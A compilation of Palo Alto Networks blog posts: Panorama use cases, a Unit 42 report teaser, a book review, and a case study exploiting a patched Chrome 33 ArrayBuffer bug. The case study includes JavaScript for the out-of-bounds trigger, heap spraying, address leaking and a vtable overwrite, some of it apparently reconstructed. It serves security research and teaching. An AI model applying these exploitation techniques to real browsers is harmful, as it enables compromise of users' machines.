3 Use Cases for Panorama

Did you know that you can find use cases for our products on our Technical Documentation portal? Our use case examples provide realistic scenarios and topologies that walk through a complete, start-to-finish configuration. Besides showcasing the primary capabilities of the product, they highlight features that are easy to overlook or that complement each other.

In this post, we share 3 use cases for Panorama.

1. Use Case: Configure Firewalls Using Panorama

This use case is based on a scenario where you want to use Panorama in a high availability configuration to manage a dozen firewalls on your network: you have six firewalls deployed across six branch offices, a pair of firewalls in a high availability configuration at each of two datacenters, and a firewall in each of the two regional head offices.

To read more about the workflow for designing a central management strategy for this scenario, see Use Case: Configure Firewalls Using Panorama.

2. Use Case: Monitor Applications Using Panorama

This example takes you through the process of assessing the efficiency of your current policies and determining where you need to adjust them to fortify the acceptable use policies for your network. The use case provides information on how to analyze traffic data from applications and also provides suggestions on what changes to make to your policy configuration.

For more information, see Use Case: Monitor Applications Using Panorama.

3. Use Case: Respond to an Incident Using Panorama

This use case traces a specific incident and shows how the visibility tools such as incident notifications, threat logs, WildFire logs, and data filtering logs on Panorama can help you respond to the report. The use case also provides suggestions on updating the security policy following the analysis of an incident.

For more information, see Use Case: Respond to an Incident Using Panorama.

Want more use cases?

To find use cases for other products, select Use Case from the Information Type search facet on the Document Search.

Have a specific use case that you think we should document? We’d love to hear about it! Email us at documentation@paloaltonetworks.com.

Happy reading!

Your friendly Technical Publications team

[Palo Alto Networks Blog]

Google Chrome Exploitation – A Case Study

In this write-up, we will present several techniques used in exploiting a vulnerability in Google Chrome, and the various difficulties posed by its security mechanisms and design considerations. We also offer some reflections on how some of the techniques used have been made irrelevant by mitigations introduced since then.

The exploit was developed for a bug in Chrome 33 that was the subject of geohot’s winning submission to Pwn2Own 2014, which later also earned him the Best Client-Side Bug Pwnie award.

The Bug

The vulnerability existed in Chrome’s implementation of ArrayBuffers, and is described in some detail on this issue page in the Chromium repository, along with an impressively concise exploit implemented by geohot himself.

This information was unavailable when we were researching the submission, so we had to make do with the code diff.

To keep things short, let’s just take a look at the relevant fix. Surprisingly, the vulnerability and the fix were in the internal JavaScript code used by the V8 engine, and not in a native component:
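What follows is a hedged reconstruction of the relevant hunk, paraphrased from the description below rather than the verbatim Chromium diff; the code is V8’s internal JavaScript for constructing a typed array on top of a buffer:

    // Before the fix: a plain property read, which page JavaScript can hook.
    var bufferByteLength = buffer.byteLength;

    // After the fix: a native runtime call (denoted by the % prefix), which
    // user code cannot override.
    var bufferByteLength = %ArrayBufferGetByteLength(buffer);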

What we’re seeing here is the code that would be invoked whenever a Typed Array of any sort (Uint32/16/8 etc) is constructed on top of an existing ArrayBuffer instance.

On the left, we see that before the fix, the bufferByteLength is determined by reading the byteLength field of the underlying instance.

On the right, we see that the length is now retrieved via a call to %ArrayBufferGetByteLength, which denotes a native function call.

This byte length is later used to calculate the element length of the new Typed Array (byteLength / sizeof(element)); for example, a reported byteLength of 0x20 would yield a Uint32Array of 8 elements.

The issue then lies with the user’s ability to somehow control the byte length field of an ArrayBuffer. Amusingly, this is accomplished by simply overriding the byteLength getter for an ArrayBuffer instance.

Consider this code snippet:
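(A hedged reconstruction based on the description below, not geohot’s original PoC:)

    // Instantiate a small, 0x20-byte buffer.
    var ab = new ArrayBuffer(0x20);

    // Lie about the buffer's size by overriding its byteLength getter.
    ab.__defineGetter__("byteLength", function () {
      return 0xfffffffc;  // an enormous, bogus length
    });

    // In vulnerable Chrome 33 builds, the typed-array constructor trusts the
    // getter and produces a Uint32Array reaching far beyond the real 0x20 bytes.
    var oob = new Uint32Array(ab);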

An ArrayBuffer 0x20 bytes in size is instantiated. Its byteLength getter is then overridden using the __defineGetter__ method.

If you refer to the fixed code above, the issue becomes clear: you can trick the browser into creating a Typed Array of arbitrary size, based on an ArrayBuffer instance of particularly small size.

This is a remarkably elegant bug that takes you directly to full relative memory control.

Exploitation

So, we have an Array object which spans the entire 32-bit memory space, giving us read/write access to all of it.
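A minimal sketch of the primitives this yields, assuming oob is the oversized Uint32Array from the snippet above and that, as described, its reach spans the entire 32-bit space:

    // Relative read/write, at byte offsets from the buffer's base.
    function relRead32(off)     { return oob[off >>> 2]; }
    function relWrite32(off, v) { oob[off >>> 2] = v; }

    // Once the buffer's absolute base is recovered (see the basing technique
    // below), absolute helpers follow directly.
    var bufferBase = 0;  // filled in later
    function read32(addr)     { return relRead32((addr - bufferBase) >>> 0); }
    function write32(addr, v) { relWrite32((addr - bufferBase) >>> 0, v); }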

In order to leverage this into code execution we’ll need to accomplish two objectives:

  1. Discover the location of our Array object in memory, in order to upgrade our relative r/w into full-blown absolute memory r/w.
  2. Control EIP: Find a function pointer to corrupt, preferably a vtable of an object we can control.

These two steps are somewhat trivial in other browsers, but Chrome follows several security oriented design principles which make exploitation much more difficult.

PartitionAlloc

PartitionAlloc is a feature of Chromium’s WebKit fork – Blink.

It serves the purpose of creating memory sterility by partitioning heap allocations according to their purpose and nature – it avoids juxtaposing metadata or control data with buffer and user-input data, which is rightfully perceived to be more vulnerable.

There are 4 partitions:

  1. Object Model Partition (Element objects etc)
  2. Renderer Partition
  3. Buffer Partition (Where an ArrayBuffer or a string would be allocated)
  4. General Partition

PartitionAlloc maintains several allocation “entities”, from small to large – buckets, super-pages, and extents.

Super-pages are the building blocks of a partition, and are 0x200000 bytes in size each; an extent describes a sequence of super-pages.

A partition is composed of one or more extents.

Each super-page is transparently divided into buckets, which are selected according to the “order” and size of the requested allocation.

On top of that, each super-page has “guard” areas, which prevent an attacker from sequentially reading/writing/overflowing memory:

Specifically, a super-page comprises a metadata page, an actual data area (0x1f8000 bytes in length) and several guard areas (reserved, inaccessible pages).
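A rough sketch of the arithmetic this layout implies (the constants are from the text; the helper names, and the assumption that super-pages are aligned to their own size, are ours):

    // Constants from the text: 0x200000-byte super-pages, 0x1000-byte pages.
    var SUPER_PAGE_SIZE = 0x200000;
    var PAGE_SIZE       = 0x1000;

    // Assuming super-pages are aligned to their own size, masking any address
    // inside one yields the super-page base; the metadata page sits one page
    // above that base (a detail we rely on later), and the 0x1f8000-byte data
    // area is fenced off by guard pages.
    function superPageBase(addr) { return (addr & ~(SUPER_PAGE_SIZE - 1)) >>> 0; }
    function metadataPage(addr)  { return superPageBase(addr) + PAGE_SIZE; }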

What this means for us is that even though we have full relative read, we can’t just go around reading memory freely, since our faulty ArrayBuffer will be located inside one of these 0x1f8000-byte areas surrounded by reserved pages.

Worse than that, since PartitionAlloc is well implemented and enforced throughout the project, we are unable to allocate any object with a vtable in our proximity.

Basing our buffer

So, we know we have an array object located somewhere in memory, from which we can read the entire memory space relative to our buffer, but since we don’t know its base, we can’t convert this into absolute r/w.

The solution we came up with in order to overcome this, given PartitionAlloc’s obstacles, was to create an object in the near vicinity of our faulty buffer, and then spray a significant number of items which point back to this object.

Both the single object and the sprayed pointers to it would have to be allocated in the buffer partition, same as our faulty array.

This is done by creating a simple string of a similar size to our faulty ArrayBuffer, thus placing it in the same or an adjacent bucket, and then spraying a moderate number of attribute objects with different names but the same value – our string.
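A hedged sketch of that spray, assuming DOM attributes serve as the attribute objects (the post does not show the original code; names and counts are illustrative):

    // A string about the size of our faulty 0x20-byte ArrayBuffer, so that it
    // lands in the same or an adjacent bucket of the buffer partition.
    var anchor = new Array(0x21).join("A");

    // Many attributes with different names but the same value: thousands of
    // pointers back to one string, all allocated in the buffer partition.
    var el = document.createElement("div");
    for (var i = 0; i < 0x4000; i++) {
      el.setAttribute("spray_" + i, anchor);
    }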

The purpose of this is to get Chrome to allocate a few more super-pages directly following the super-page we’re in, from which we can read a pointer to the string adjacent to us.

By blindly reading 0x200000 bytes ahead (super-page size), we can read the attribute pairs created and heuristically infer the absolute address of the attribute we created.

Then, by scanning the memory near us, we can attempt to infer the relative offset of the attribute string from our array buffer. Combining the absolute address of the attribute string with its distance relative to us allows us to calculate our address in memory, completing objective #1.

This is the code that achieves the condition described and resolves the location of the corrupted buffer, allowing us to set up absolute r/w abstractions.
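The listing below is a hedged reconstruction of that routine (strides and constants are illustrative):

    var WORDS_PER_SUPER_PAGE = 0x200000 >> 2;

    // Step 1: read blindly into the next super-page and look for a value that
    // repeats at a fixed stride: the sprayed attribute slots all hold a
    // pointer to our anchor string.
    var anchorAddr = 0;
    for (var i = WORDS_PER_SUPER_PAGE; i < 2 * WORDS_PER_SUPER_PAGE; i++) {
      if (oob[i] !== 0 && oob[i] === oob[i + 8] && oob[i] === oob[i + 16]) {
        anchorAddr = oob[i];
        break;
      }
    }

    // Step 2: scan the memory near us for the anchor string's payload
    // ("AAAA...") to learn its offset relative to our buffer.
    var relOffset = 0;
    for (var j = 0; j < WORDS_PER_SUPER_PAGE; j++) {
      if (oob[j] === 0x41414141 && oob[j + 1] === 0x41414141) {
        relOffset = j << 2;
        break;
      }
    }

    // The anchor's absolute address minus its distance from us gives the
    // absolute base of our corrupted buffer.
    bufferBase = (anchorAddr - relOffset) >>> 0;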

Gaining execution

Our next objective is to gain execution by overriding a vtable for some object.

We actually broke this objective into two subtasks – leaking a pointer and overriding a vtable.

We’ve already established that we’ll have difficulty finding a pointer in our partition.

Ironically, the metadata page of the partition itself solves this issue.

Since we know how partitions are formed in Chrome 33, we can apply some more heuristic logic to bring us to the metadata page of our partition (exactly 1 page up from the super-page base), which happens to contain a few bucket pointers.

Since we don’t know exactly where we are relative to the super-page’s base (not strictly true, since we already know our absolute location), we resort to scanning backwards at 0x10000 intervals, plus a constant 0x1028 offset.

We know we’ve found a bucket pointer once we find a value which repeats itself 0x20 bytes ahead several times.
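A hedged sketch of that scan (the 0x10000 interval and 0x1028 offset are from the text; read32 is the absolute-read helper from earlier):

    function findBucketPointer(selfAddr) {
      for (var back = 0x10000; back <= 0x200000; back += 0x10000) {
        var addr = (selfAddr - back + 0x1028) >>> 0;
        var v = read32(addr);
        // A bucket pointer shows up as the same value repeating 0x20 apart.
        if (v !== 0 && v === read32(addr + 0x20) && v === read32(addr + 0x40)) {
          return v;
        }
      }
      return 0;
    }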

At this point we’ve accomplished half of our second objective, but this doesn’t really help us gain code execution.

The approach we took from here on was to simply spray a large amount (400MB or so) of HTMLDivElement objects, which we then tried to overwrite by accessing a constant address.

This sort of makes the previous leak redundant, but we decided to show it anyway since it opens up a few interesting options for exploitation. We’ll discuss those in a moment.

Naturally this has a lot of disadvantages, chief among which is the fact that these Divs would be allocated in the DOM partition, and partition bases are randomized, reducing our chances of success somewhat.

Maneuvering around the Chrome memory space

A more sophisticated approach exists, but unfortunately it relies on changes that were only introduced after this bug was fixed.

We tested this method by artificially creating the same corrupt ArrayBuffer condition in a newer version of Chrome (36 was the most recent at the time) using a debugger.

It relies on an interesting detail of the PartitionAlloc structures, namely the invertedSelf member of the PartitionRootBase struct.

Being a static struct, the PartitionRootBase for each partition would be located in chrome_child’s data section.

Since we have arbitrary r/w access and a pointer to chrome_child’s base, we can definitely find these structures by once again applying a simple heuristic.

The invertedSelf field is located at offset 0x68, so any value for which ~value == &value – 0x68 is highly likely to belong to a PartitionRootBase struct.
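A hedged sketch of that heuristic (the 0x68 offset is from the text; the scan bounds would come from chrome_child’s data-section range):

    function findPartitionRoots(dataStart, dataEnd) {
      var roots = [];
      for (var addr = dataStart; addr < dataEnd; addr += 4) {
        var v = read32(addr);
        // invertedSelf == ~this and sits at offset 0x68, so ~value should
        // point exactly 0x68 bytes below the value's own address.
        if ((~v >>> 0) === ((addr - 0x68) >>> 0)) {
          roots.push((addr - 0x68) >>> 0);
        }
      }
      return roots;  // per the text: exactly 4, one per partition
    }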

Indeed, this function returns exactly 4 matches, one per PartitionRootBase.

Finding the Object Model Partition can then be accomplished by creating a moderate number of Divs, enough to fill one super-page of its partition with HTMLDivElement objects, and scanning each partition’s currentExtent looking for the pattern created by these 0x34-byte objects.

Once we find the HTMLDivElements, it’s a simple matter of overriding a vtable and then iterating over all the Divs we allocated, calling a specific method on each.
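A hedged sketch of that final step (every address, offset, and variable here is an illustrative assumption; the post does not show this code):

    // Build a fake vtable inside memory whose contents we control, with a
    // hypothetical virtual-method slot pointing at our payload.
    var fakeVtable = bufferBase + 0x100;
    write32(fakeVtable, payloadAddr);

    // Point each sprayed div's vtable pointer (its first field) at the fake
    // table; divAddr is where the 0x34-byte HTMLDivElement pattern was found.
    for (var off = 0; off < 0x1f8000; off += 0x34) {
      write32((divAddr + off) >>> 0, fakeVtable);
    }

    // Any DOM call that dispatches through the vtable now jumps to our
    // pointer; iterate over the sprayed divs and poke one.
    for (var i = 0; i < divs.length; i++) {
      divs[i].normalize();
    }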

Using this method it’s possible to achieve fairly high reliability with a very small memory footprint.

Conclusion

All in all, exploitation in Chrome is very challenging. Even once all of this has been accomplished, you still need to employ a sandbox bypass in order to achieve full exploitation.

In addition, some of the methods described here are no longer relevant. Specifically, it seems that the Chromium developers have added an additional layer of protection by fragmenting super-pages into writable and reserved pages even within the 0x1f8000-byte area, making resolving our buffer’s address even harder.

Google Chrome incorporates security considerations into the design of the browser to a very impressive degree.

Unfortunately, not all software vendors hold themselves to the Chromium project’s standards. Palo Alto Networks Traps acts to prevent several types of attacks, even those that may circumvent or overcome mechanisms such as Chrome’s, fortifying existing defenses while adding significant additional mitigation mechanisms. Learn more about Advanced Endpoint Protection here.

[Palo Alto Networks Blog]

Unit 42 Explores Malware Attack Vectors in Key Industries

This week Unit 42 released its first Threat Landscape Review, looking at how malware trends affect key industries around the world, from healthcare to high tech, and at the particular persistence of the Kuluoz (also known as Asprox) campaign.

This infographic represents some of the key data from the full report, which you can download from the Unit 42 page. Does anything shown here surprise you?

[Palo Alto Networks Blog]

The Cybersecurity Canon: Where Wizards Stay Up Late

The Cybersecurity Canon is official, and you can now see our website here. We modeled it after the Baseball and Rock & Roll Halls of Fame, except for cybersecurity books. We have 20 books on the initial candidate list, but we are soliciting help from the cybersecurity community to grow that list much further. Please write a review and nominate your favorite.

The Cybersecurity Canon is a real thing for our community. We have designed it so that you can directly participate in the process. Please do so!

Book Review: Where Wizards Stay Up Late: The Origins of the Internet (1996) by Katie Hafner and Matthew Lyon

This review was written by Bob Clark, a member of the Cybersecurity Canon committee. Bob is a cyber operational lawyer for the Army Cyber Institute, United States Military Academy in West Point, New York, taking over these duties from his position as Distinguished Professor of Law (Cyber) at the Naval Academy. A career military officer and attorney, he has over 20 years of experience within the Department of Defense, having served at its counterdrug command as well as in numerous other challenging positions. Read Bob’s full bio, and those of our other Committee members, on the Cybersecurity Canon home page here.

Executive Summary

This book chronicles the true early beginnings of the Internet and the many hard-working engineers and computer scientists who designed and built it from the ground up. Cybersecurity practitioners across the spectrum today, from policy wonks all the way over to the deep-level geek malware researchers, will get a kick out of learning about the eccentric personalities of the people who built the Internet and the robust designs that provided a catalyst to the greatest economic and social change engine ever invented. For the youngsters out there, this is a history lesson. Be quiet and take your medicine. You need to know this. Trust us. For the old timers, you have heard most of this stuff before in drips and drabs. Wizards will put it all together for you. You should have read this by now.

Introduction

I am not a techie. I believe it is “chic to be geek,” but I am not a full-fledged geek. There are a few things you must realize. First, I am under “orders” to write this review. OK, so maybe not technically under “orders” to write this. But as a member of the Cybersecurity Canon Committee and the only lawyer in the group, I am the committee member most likely to write a review for books that fall into the non-technical category, such as history, where Wizards firmly settles. Next, being only part geek, I wanted to reference and use many other reviewers’ comments in order to ensure a fair review of this material.

Amazon.com reviewers overall rated Where Wizards Stay Up Late 4.5 out of 5 stars, with 61 out of 96 giving it the top mark of 5 stars. And, to summarize many of those reviews: this is a good book if you are in the field or thinking about studying the subject. If not, then as one reviewer said, it may feel more like you are reading a textbook than being drawn into a page-turning read. Cybersecurity Canon candidate books are supposed to be essential to the cybersecurity practitioner, and I would classify how the Internet got started as being related to our field. With that said, the origins of the Internet are extremely complex, with “many fathers,” as Hafner puts it. Explaining this complexity requires an intelligible history that connects the technology story to the people who invented the technology.

The Story

After the launch of Sputnik, President Eisenhower’s (already developed) passion for “his scientists” increased. When he was told, “all scientists are Democrats,” he replied, “I don’t believe it, but anyway, I like scientists for their science and not their politics.”

On January 7, 1958, Eisenhower sent a message to Congress requesting startup funds for the establishment of the Advanced Research Projects Agency (ARPA), recognizing, as Hafner explains, “the need for single control in some of our most advanced development projects.” Things looked rosy for the new agency, with grandiose budgets and flourishing plans, right up until a little agency called NASA showed up, enacted under law, and gutted ARPA’s budget and programs.

Hafner writes, “Aviation Week called the young agency a dead cat hanging in the fruit closet.” So the staff of ARPA decided to tap into university research projects and focus on “far-out” research. The universities responded, sensing that dollars would flow their way to conduct “high-risk, high-gain” research. But what fell into ARPA’s lap, and more importantly into its funding, was the upkeep of an Air Force computer, the Q-32.

It was recognized that, as Hafner explains, “computers, as they related to command and control, might one day provide high-speed, reliable information upon which to base critical military decisions. That potential, largely unfilled, seemed endlessly promising.” That identification of a government mission no one else was pursuing sent ARPA on its way to develop not only the computers and networks required for military command and control, but also, through its scientists and university researchers, the open and collaborative research networks of their peers.

As the review from Publishers Weekly points out,

While the book attempts to debunk the conventional notion that ARPANET was devised primarily as a communications link that could survive nuclear war (essentially it was not), pioneer developers like Paul Baran (who, along with British scientist Donald Davies, devised the Internet’s innovative packet-switching message technology) recognized the importance of an indestructible message medium in an age edgy over the prospects of global nuclear destruction.

About the People

The story follows those pioneers from ARPA and the engineering firm of Bolt, Beranek and Newman, as well as dozens of others who combined hardware and software to establish the ARPAnet and send us on our way to the Internet. With so many “Internet fathers,” how can a review capture them all? The book does a great job recognizing many of those who were behind this adventure. And like our founding fathers, what is amazing is their age and their unique opportunity to be “engineering pioneers and discoverers.”

The idea of graduate students or young “new” engineers working on this equipment with such unsupervised responsibility seems totally unimaginable, particularly in today’s age of established firms with government contracts and oversight. Wizards does a good job explaining their contributions and admirably lends a little context to their personalities, their drive, and their ability (or lack thereof) to be team players.

About the Tech

So you want to learn about the technology of this period? This is the book for you! The description of the hardware and software development is well done and detailed. I know more about IMPs (Interface Message Processors) now than I probably ever really wanted to, and I think this is where the book makes its mark. If you are in this business and want to dive into the technological development of the ARPAnet and its protocols without pulling out the IEEE white papers or RFCs, this is for you.

Conclusion

This is a worthy book for inclusion on the Cybersecurity Canon nomination list for both the techies in the community and the non-techies. For the non-techies in the crowd (policy wonks, lawyers, etc.), Wizards will help you understand enough about the technology to converse with techies at some level.

While I agree with other reviewers I’ve seen who say they wish it read better as a story, Wizards does provide a great understanding of the technology and gives you a feel for the pioneers who made it happen. And there is no better way to find acceptance into a community that will shun you without the appropriate bona fides (either through education or work experience) than to learn to speak the technology and know the names and backgrounds of the pioneers and giants in this field. This book will definitely give you that information. For the techies in the group, you are going to get a bird’s-eye view of how the engineers conceived and implemented the beginnings of the Internet.

References

Hafner, Katie, and Matthew Lyon. Where Wizards Stay Up Late: The Origins of the Internet. New York: Touchstone/Simon & Schuster, 1996.

[Palo Alto Networks Blog]
